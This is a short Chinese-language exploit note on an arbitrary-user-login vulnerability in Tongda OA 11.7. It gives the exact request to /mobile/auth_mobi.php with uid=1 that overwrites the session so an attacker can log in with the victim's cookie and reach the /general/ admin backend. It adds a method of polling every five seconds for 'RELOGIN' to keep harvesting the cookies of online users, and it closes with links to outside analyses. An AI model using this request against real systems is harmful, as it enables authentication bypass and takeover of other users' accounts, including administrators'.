通达OA11.7 任意用户登陆

条件需要管理员在线

http://192.168.1.22/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0

访问路径，覆盖了session直接用cookie登陆，访问目录/general/进入后台

访问目标后台 http://xxx.xxx.xxx.xxx/general/ 当目标离线时则访问漏洞页面则会出现：RELOGIN

5秒一次测试用户是否在线

通过此思路可以持续发包监控此页面来获取在线用户的Cookie

404实验室的分析：https://paper.seebug.org/1492/

ref：

• https://www.o2oxy.cn/3158.html
• https://mp.weixin.qq.com/s/5M40Oux_89dgy5QAUhULGg